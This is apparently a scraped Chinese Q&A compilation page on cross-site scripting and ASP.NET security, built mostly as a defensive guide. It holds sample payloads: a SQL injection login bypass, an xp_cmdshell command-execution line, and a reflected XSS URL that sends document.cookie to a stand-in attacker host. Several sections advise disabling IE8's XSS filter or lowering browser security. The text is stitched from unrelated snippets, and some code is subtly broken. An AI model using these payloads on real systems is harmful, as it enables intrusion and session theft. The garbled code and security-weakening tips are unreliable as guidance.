net跨站腳本

1. 跨站腳本攻擊的危害

為了搜集用戶信息，攻擊者通常會在有漏洞的程序中插入 javaScript、VBScript、 ActiveX或Flash以欺騙用戶（詳見下文）。一旦得手，他們可以盜取用戶帳戶，修改用戶設置，盜取/污染cookie，做虛假廣告等。每天都有大量的XSS攻擊的惡意代碼出現。 Brett Moore的下面這篇文章詳細地闡述了「拒絕服務攻擊」以及用戶僅僅閱讀一篇文章就會受到的「自動攻擊」。 1.HTML注入。所有HTML注入範例只是注入一個JavaScript彈出式的警告框：alert(1)。
2.做壞事。如果您覺得警告框還不夠刺激，當受害者點擊了一個被注入了HTML代碼的頁面鏈接時攻擊者能作的各種的惡意事情。
3.誘捕受害者。 「微博病毒」攻擊事件
回顧：
2011年6月28日晚，新浪微博出現了一次比較大的XSS攻擊事件。大量用戶自動發送諸如：「郭美美事件的一些未注意到的細節」，「建黨大業中穿幫的地方」，「讓女人心動的100句詩歌」，「3D肉團團高清普通話版種子」，「這是傳說中的神仙眷侶啊」，「驚爆!范冰冰艷照真流出了」等等微博和私信，並自動關注一位名為hellosamy的用戶。
事件的經過線索如下：
20:14，開始有大量帶V的認證用戶中招轉發蠕蟲
20:30，某網站中的病毒頁面無法訪問
20:32，新浪微博中hellosamy用戶無法訪問
21:02，新浪漏洞修補完畢 隨著AJAX（Asynchronous JavaScript and XML，非同步JavaScript和XML）技術的普遍應用，XSS的攻擊危害將被放大。使用AJAX的最大優點，就是可以不用更新整個頁面來維護數據，Web應用可以更迅速地響應用戶請求。AJAX會處理來自Web伺服器及源自第三方的豐富信息，這對XSS攻擊提供了良好的機會。AJAX應用架構會泄漏更多應用的細節，如函數和變數名稱、函數參數及返回類型、數據類型及有效范圍等。AJAX應用架構還有著較傳統架構更多的應用輸入，這就增加了可被攻擊的點。

2. 如何取消阻止跨站腳本

取消阻止跨站腳本，請按以下步驟操作：

1、點擊 IE8 的「工具」-「Internet 選項」。

(2)net跨站腳本擴展閱讀

IE瀏覽器的安全構架：

Internet Explorer使用一個基於區域的安全架構，意思是說網站按特寫的條件組織在一起。它允許對大量的功能進行限制，也允許只對指定功能進行限制。

對瀏覽器的補丁和更新通過Windows更新服務以及自動更新定期發布以供使用。

最新版的Internet Explorer提供了一個下載監視器和安裝監視器，允許用戶分兩步選擇是否下載和安裝可執行程序。這可以防止惡意軟體被安裝。

用Internet Explorer下載的可執行文件被操作系統標為潛在的不安全因素，每次都會要求用戶確認他們是否想執行該程序，直到用戶確認該文件為「安全」為止。

參考資料來源：網路-Internet Explorer

3. 跨站腳本攻擊是什麼意思

XSS，跨站腳本攻擊，Cross-Site
Scripting，為了和前端的CSS避免重名，簡稱為XSS，是指通過技術手段，向正常用戶請求的HTML頁面中插入惡意腳本，執行。
這種攻擊主要是用於信息竊取和破壞等目的。在防範XSS上，主要就是通過對用戶輸入的數據做過濾或者或者轉義，可以使用框架提供的工具類HTML
Util，另外前端在瀏覽器展示數據的時候，要使用安全的API展示數據。比如使用inner text而不是inner HTML。

4. 關於.NET網站安全的方案

以下內容為復制信息，非原創，如有幫助請給分！

保證應用程序的安全應當從編寫第一行代碼的時候開始做起，原因很簡單，隨著應用規模的發展，修補安全漏洞所需的代價也隨之快速增長。根據IBM的系統科學協會（Systems Sciences Institute）的研究，如果等到軟體部署之後再來修補缺陷，其代價相當於開發期間檢測和消除缺陷的15倍。

為了用最小的代價保障應用程序的安全，在代碼本身的安全性、抗禦攻擊的能力等方面，開發者應當擔負更多的責任。然而，要從開發的最初橘升階段保障程序的安全性，必須具有相應的技能和工具，而真正掌握這些技能和工具的開發者並不是很多。雖然學寫安全的代碼是一個復雜的過程，最好在大學、內部培訓會、行業會議上完成，但只要掌握了下面五種常罩虧見的ASP.NET應用安全缺陷以及推薦的修正方案，就能夠領先一步，將不可或缺的安全因素融入到應用的出生之時。

一、不能盲目相信用戶輸入

在Web應用開發中，開發者最大的失誤往往是無條件地信任用戶輸入，假定用戶（即使是惡意用戶）總是受到瀏覽器的限制，總是通過瀏覽器和伺服器交互，從而打開了攻擊Web應用的大門。實際上，黑客們攻擊和操作Web網站的工具很多，根本不必局限於瀏覽器，從最低級的字元模式的原始界面（例如telnet），到CGI腳本掃描器、Web代理、Web應用掃描器，惡意用戶可能採用的攻擊模式和手段很多。

因此，只有嚴密地驗證用戶輸入的合法性，才能有效地抵抗黑客的攻擊。應用程序可以用多種方法（甚至是驗證范圍重疊的方法）執行驗證，例如，在認可用戶輸入之前執行驗證，確保用戶輸入只包含合法的字元，而且所有輸入域的內容長度都沒有超過范圍（以防範可能出現的緩沖區溢出攻擊），在此基礎上再執行其他驗證，確保用戶輸入的數據不僅合法，而且合理。必要時不僅可以採取強制性的長度限制策略，而且還可以對輸入內容按照明確定義的特徵集執行驗證。下面幾點建議將幫助你正確驗證用戶輸入數據：

⑴ 始終對所有的用戶輸入執行驗證，且驗證必須在一個可靠的平台上進行，應當在應物伍神用的多個層上進行。

⑵ 除了輸入、輸出功能必需的數據之外，不要允許其他任何內容。

⑶ 設立「信任代碼基地」，允許數據進入信任環境之前執行徹底的驗證。

⑷ 登錄數據之前先檢查數據類型。

⑸ 詳盡地定義每一種數據格式，例如緩沖區長度、整數類型等。

⑹ 嚴格定義合法的用戶請求，拒絕所有其他請求。

⑺ 測試數據是否滿足合法的條件，而不是測試不合法的條件。這是因為數據不合法的情況很多，難以詳盡列舉。

二、五種常見的ASP.NET安全缺陷

下面給出了五個例子，闡述如何按照上述建議增強應用程序的安全性。這些例子示範了代碼中可能出現的缺陷，以及它們帶來的安全風險、如何改寫最少的代碼來有效地降低攻擊風險。

2.1 篡改參數

◎ 使用ASP.NET域驗證器

盲目信任用戶輸入是保障Web應用安全的第一敵人。用戶輸入的主要來源是HTML表單中提交的參數，如果不能嚴格地驗證這些參數的合法性，就有可能危及伺服器的安全。

下面的C#代碼查詢後端SQL Server資料庫，假設user和password變數的值直接取自用戶輸入：

SqlDataAdapter my_query = new SqlDataAdapter(
"SELECT * FROM accounts WHERE acc_user='" + user + "' AND acc_password='" + password, the_connection);

從表面上看，這幾行代碼毫無問題，實際上卻可能引來SQL注入式攻擊。攻擊者只要在user輸入域中輸入「OR 1=1」，就可以順利登錄系統，或者只要在查詢之後加上適當的調用，就可以執行任意Shell命令：

'; EXEC master..xp_cmdshell(Oshell command here')--

■ 風險分析

在編寫這幾行代碼時，開發者無意之中作出了這樣的假定：用戶的輸入內容只包含「正常的」數據——合乎人們通常習慣的用戶名字、密碼，但不會包含引號之類的特殊字元，這正是SQL注入式攻擊能夠得逞的根本原因。黑客們可以藉助一些具有特殊含義的字元改變查詢的本意，進而調用任意函數或過程。

■ 解決方案

域驗證器是一種讓ASP.NET開發者對域的值實施限制的機制，例如，限制用戶輸入的域值必須匹配特定的表達式。

要防止上述攻擊行為得逞，第一種辦法是禁止引號之類的特殊字元輸入，第二種辦法更嚴格，即限定輸入域的內容必須屬於某個合法字元的集合，例如「[a-zA-Z0-9]*」。

2.2 篡改參數之二

◎ 避免驗證操作的漏洞

然而，僅僅為每個輸入域引入驗證器還不能防範所有通過修改參數實施的攻擊。在執行數值范圍檢查之時，還要指定正確的數據類型。

也就是說，在使用ASP.NET的范圍檢查控制項時，應當根據輸入域要求的數據類型指定適當的Type屬性，因為Type的默認值是String。

<!-- 要求輸入值必須是1-9之間的數字 -->
<asp:RangeValidator ... MinimumValue="1" MaximumValue="9" .../>

■ 風險分析

由於沒有指定Type屬性值，上面的代碼將假定輸入值的類型是String，因此RangeValidator驗證器只能確保字元串由0-9之間的字元開始，「0abcd」也會被認可。

■ 解決方案

要確保輸入值確實是整數，正確的辦法是將Type屬性指定為Integer：

<!-- 要求輸入值必須是1-9之間的數字 -->
<asp:RangeValidator ... MinimumValue="1"
MaximumValue="9" Type="Integer"

2.3 信息泄漏

◎ 讓隱藏域更加安全

在ASP.NET應用中，幾乎所有HTML頁面的__VIEWSTATE隱藏域中都可以找到有關應用的信息。由於__VIEWSTATE是BASE 64編碼的，所以常常被忽略，但黑客可以方便地解碼BASE 64數據，用不著花什麼力氣就可以得到__VIEWSTATE提供的詳細資料。

■ 風險分析

默認情況下，__VIEWSTATE數據將包含：

⑴ 來自頁面控制項的動態數據。

⑵ 開發者在ViewState中顯式保存的數據。

⑶ 上述數據的密碼簽字。

■ 解決方案

設置EnableViewStatMAC="true"，啟用__VIEWSTATE數據加密功能。然後，將machineKey驗證類型設置成3DES，要求ASP.NET用Triple DES對稱加密演算法加密ViewState數據。

2.4 SQL注入式攻擊

◎ 使用SQL參數API

正如前文「篡改參數」部分描述的，攻擊者可以在輸入域中插入特殊字元，改變SQL查詢的本意，欺騙資料庫伺服器執行惡意的查詢。

■ 風險分析

惡意查詢有可能獲取後端資料庫保存的任何信息，例如客戶信用卡號碼的清單。

■ 解決方案

除了前面介紹的辦法——用程序代碼確保輸入內容只包含有效字元，另一種更加健壯的辦法是使用SQL參數API（例如ADO.NET提供的API），讓編程環境的底層API（而不是程序員）來構造查詢。

使用這些API時，開發者或者提供一個查詢模板，或者提供一個存儲過程，然後指定一系列的參數值，由底層API將參數值嵌入到查詢模板，然後將構造出來的查詢提交給伺服器查詢。這種辦法的好處是確保參數能夠正確地嵌入，例如，系統將對引號進行轉義處理，從根本上杜絕SQL注入式攻擊的發生。同時，在表單中引號仍是一個允許輸入的有效字元，這也是使用底層API的一個優點。

按照這種思路修改前文「篡改參數」部分的例子，結果如下：

SqlDataAdapter my_query = new SqlDataAdapter("SELECT * FROM accounts
WHERE acc_user= @user AND acc_password=@pass", the_connection);
SqlParameter userParam = my_query.Select_Command.Parameters.Add(
"@user",SqlDb.VarChar,20);
userParam.Value=user;
SqlParameter passwordParam = my_query.Select_Command.Parameters.Add(
"@",SqlDb.VarChar,20);
passwordParam.Value=password;

2.5 跨站腳本執行

◎ 對外發的數據進行編碼

跨站腳本執行（Cross-site scripting）是指將惡意的用戶輸入嵌入到應答（HTML）頁面。例如，下面的ASP.NET頁面雖然簡單，卻包含著一個重大的安全缺陷：

<%@ Page Language="vb" %>
<asp:Label id="Label1" runat="server">
標簽文字
</asp:Label>
<form method="post" runat="server" ID="Form1">
請在此處輸入反饋信息<br>
<asp:Textbox ID="feedback" runat="server"/><br>
<asp:Button id="cmdSubmit" runat="server"
Text="提交!" OnClick="do_feedback">
</asp:Button>
</form>
<script runat="server">
Sub do_feedback(sender As Object, e As System.EventArgs)
Label1.Text=feedback.Text
End Sub
</script>

■ 風險分析

攻擊者可以用JavaScript代碼構造一個惡意的查詢，點擊鏈接時JavaScript就會運行。舉例來說，腳本可以通過下面的用戶輸入來嵌入：

<script>alert(document.cookie)
</script>

■ 解決方案

在一個雙層的安全體系中，對HTML頁面中出現的外發用戶數據執行輸入驗證和HTML編碼，確保瀏覽器只把用戶輸入數據當成純粹的文本，而不是其他具有特殊含義的內容，例如HTML代碼、JavaScript腳本。

對於本例，只要加入一個HtmlEncode調用即可：

Label1.Text=Server.HtmlEncode(feedback.Text)

這樣，應答HTML流將包含用戶輸入內容的HTML編碼版本，也就是說，瀏覽器不會執行用戶輸入的JavaScript代碼，因為根本不存在HTML的「<SCRIPT>」標記，用戶輸入的「<」和「>」字元已經被替換成HTML編碼版本，即「<」和「>」。

三、使用自動安全測試工具

由於客戶需求不斷變化，一些單位平均每三個月就要部署新的應用，同時由於人員流動，所以對開發者快速開發健壯的、高質量的代碼寄予很高的期望。雖然對所有開發者進行代碼安全技術的培訓是十分必要的，但不可否認，自動檢測代碼安全漏洞的工具也有助於快速開發安全的應用程序。

到目前為止，開發者常用的工具只能涵蓋功能測試的特定方面，例如性能測試，BUG/故障點偵查。人工檢查代碼有著許多與生俱來的局限，而且要求開發者具有豐富的代碼安全經驗，所以對於編寫高質量的應用來說，面向應用程序安全及其在惡意環境下行為的工具也是十分關鍵的。

要迅速提高應用的質量和安全性，最有效的辦法是給開發者提供一個自動測試應用的工具。如果在單元測試期間，工具能夠檢測出應用的安全缺陷，並將修補建議嵌入到代碼之中，開發者就能立即找出代碼中存在的錯誤，不僅方便了現有錯誤的修改，而且也有助於避免將來再犯同樣的錯誤，不斷地提高代碼抗禦攻擊的能力。

結束語：Web服務應用正在爆炸式增長，越來越多的應用被推出到防火牆之外，安全性脆弱的Web應用面臨的風險也只會有增無減。同時，為了在緊迫的時限之前快速完成應用開發，開發者面臨的壓力也越來越大。注重編寫代碼時的安全問題，同時投入必要的資源，這樣才能為未來的Web服務應用做好准備，同時確保當前應用的高質量。只有從應用的出生之日開始就採取正確的措施來確保其安全性，才能構造出高質量、安全的應用。

5. 如何防止跨站點腳本攻擊

防止跨站點腳本攻擊的解決方法：

1.輸入過濾

對每一個用戶的輸入或者請求首部，都要進行過濾。這需要程序員有良好的安全素養，而且需要覆蓋到所有的輸入源。而且還不能夠阻止其他的一些問題，如錯誤頁等。
final String filterPattern="[<>{}\\[\\];\\&]";
String inputStr = s.replaceAll(filterPattern," ");

2.輸出過濾

public static String encode(String data)
{
final StringBuffer buf = new StringBuffer();
final char[] chars = data.toCharArray();
for (int i = 0; i < chars.length; i++)
{
buf.append("&#" + (int) chars[i]);
}
return buf.toString();
}
public static String decodeHex(final String data,
final String charEncoding)
{
if (data == null)
{
return null;
}
byte[] inBytes = null;
try
{
inBytes = data.getBytes(charEncoding);
}
catch (UnsupportedEncodingException e)
{
//use default charset
inBytes = data.getBytes();
}

byte[] outBytes = new byte[inBytes.length];
int b1;
int b2;
int j=0;
for (int i = 0; i < inBytes.length; i++)
{
if (inBytes[i] == '%')
{
b1 = Character.digit((char) inBytes[++i], 16);
b2 = Character.digit((char) inBytes[++i], 16);
outBytes[j++] = (byte) (((b1 & 0xf) << 4) +
(b2 & 0xf));
}
else
{
outBytes[j++] = inBytes[i];
}
}

String encodedStr = null;
try
{
encodedStr = new String(outBytes, 0, j, charEncoding);
}
catch (UnsupportedEncodingException e)
{
encodedStr = new String(outBytes, 0, j);
}
return encodedStr;
}
<!-- Maps the 404 Not Found response code
to the error page /errPage404 -->

<error-page>
<error-code>404</error-code>
<location>/errPage404</location>
</error-page>

<!-- Maps any thrown ServletExceptions
to the error page /errPageServ -->
<error-page>
<exception-type>javax.servlet.ServletException</exception-type>
<location>/errPageServ</location>
</error-page>

<!-- Maps any other thrown exceptions
to a generic error page /errPageGeneric -->
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/errPageGeneric</location>
</error-page>
任何的非servlet例外都被/errPageGeneric路徑捕捉，這樣就可以處理。
Throwable throwable = (Throwable)
request.getAttribute("javax.servlet.error.exception");
String status_code = ((Integer)
request.getAttribute("javax.servlet.error.status_code")).toString( );

3.安裝三方的應用防火牆，可以攔截css攻擊。

附：

跨站腳本不像其他攻擊只包含兩個部分：攻擊者和web站點。
跨站腳本包含三個部分：攻擊者，客戶和web站點。
跨站腳本攻擊的目的是竊取客戶的cookies，或者其他可以證明用戶身份的敏感信息。

攻擊
一個get請求
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host:
www.vulnerable.site
會產生如下的結果
<HTML>
<Title>Welcome!</Title>
Hi Joe Hacker
<BR>
Welcome to our system
...
</HTML>
但是如果請求被篡改
GET /welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0
Host: www.vulnerable.site
就會得到如下的響應
<HTML>
<Title>Welcome!</Title>
Hi <script>alert(document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>
這樣在客戶端會有一段非法的腳本執行，這不具有破壞作用，但是如下的腳本就很危險了。
http://www.vulnerable.site/welcome.cgi?name=<script>window.open(「http://www.attacker.site/collect.cgi?cookie=」%2Bdocument.cookie)</script>
響應如下：
<HTML>
<Title>Welcome!</Title>
Hi
<script>window.open(「http://www.attacker.site/collect.cgi?cookie=」+document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>
瀏覽器回執行該腳本並將客戶的cookie發到一個攻擊者的網站，這樣攻擊者就得到了客戶的cookie。

6. 如何解決跨站腳本攻擊

登陸protal後，點擊查看報表，這是protal會發送轉到cognos的請求，如果使用的IE8，則這個請求會被攔截，提示「Internet Explorer 已對此頁面進行了修改，以幫助阻止跨站腳本。單擊此處，獲取詳細信息」。這個錯誤是由於 IE8 的跨站腳本(Cross-site scripting, XSS)防護阻止了跨站發送的請求。請按以下步驟操作：
1. 點擊 IE8 的「工具」-「Internet 選項」，
2. 進入「安全」選項卡，打開「Internet」下方的「自定義級別」，
3.在「安全設置」對話框中找到「啟用 XSS 篩選器」，改為「禁用」即可。

7. 跨站腳本攻擊有哪些類型

1、持久型跨站：最直接的危害類型，跨站代碼存儲在伺服器（資料庫）。

2、非持久型跨站：反射型跨站腳本漏洞，最普遍的類型。用戶訪問伺服器-跨站鏈接-返回跨站代碼。

3、DOM跨站（DOM XSS）:DOM(document object model文檔對象模型)，客戶端腳本處理邏輯導致的安全問題。

(7)net跨站腳本擴展閱讀：

跨站腳本攻擊產生的原因是網站過於相信用戶的輸入，那麼解決的辦法也很直接，就是從根本上不相信用戶的任何輸入。一個安全的網站應當對任何用戶的任何輸入都要進行檢查，特別是對用戶提交到伺服器中保存的數據，更要做篩選。

這種攻擊與反射型攻擊不同的是，它會把自己的攻擊代碼保存在網站的伺服器上，這樣，任何訪問了這個頁面的用戶，都會受到這個攻擊。

8. 如何讓瀏覽器允許網站運行跨站腳本

1、工具——Internet選項——高級——在「允許活動內容在計算機上運行」
2、打開Internet Explorer工具欄的Internet選項，打開安全選項，點擊自定義級別，找到」啟用XSS篩選器」，選擇禁用
3、清除IE瀏覽器的緩存,點IE上的工具——選擇下面Internet選項，點Internet刪除文件(記得勾上刪除所有離線內容)，確定後再重新打開IE瀏覽器試試,同時請確認使用的是IE6.0及以上版本。
4、網頁上清緩存,在網頁上選擇工具->Interner選項->刪除Cookies和刪除文件,確定。
5、點擊IE瀏覽器中的「工具」，選擇「internet選項」，進入「安全」頁面，點擊「自定義級別」，將安全設置設為「低」。
6、清空IE瀏覽器的cookies文件，在IE瀏覽器中設置「禁止自動腳本更新「。
腳本script是使用一種特定的描述性語言，依據一定的格式編寫的可執行文件，又稱作宏或批處理文件。腳本通常可以由應用程序臨時調用並執行。各類腳本目前被廣泛地應用於網頁設計中，腳本不僅可以減小網頁的規模和提高網頁瀏覽速度，而且可以豐富網頁的表現，如動畫、聲音等。